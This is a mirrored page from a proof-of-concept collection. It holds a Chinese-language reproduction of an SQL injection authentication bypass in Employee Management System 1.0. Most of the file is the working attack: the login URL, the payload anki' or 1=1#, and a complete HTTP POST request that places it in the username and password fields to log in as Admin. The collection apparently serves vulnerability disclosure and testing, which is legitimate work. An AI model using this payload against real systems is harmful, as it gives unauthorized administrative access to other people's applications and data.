admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

49 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 员工管理系统 Employee Management System 1.0 身份验证绕过
## 漏洞描述
漏洞发现时间2020-10-16
软件下载地址https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
验证环境Windows 10 + xampp v3.2.4
参考链接:
- https://www.exploit-db.com/exploits/48882
## 漏洞复现
打开网址:
```
http://localhost:8081/Employee%20Management%20System/alogin.html
```
通过payload绕过验证
```
anki' or 1=1#
```
发送请求:
```
POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
Upgrade-Insecure-Requests: 1
mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login
```
将以Admin身份登录应用
Reference in New Issue View Git Blame Copy Permalink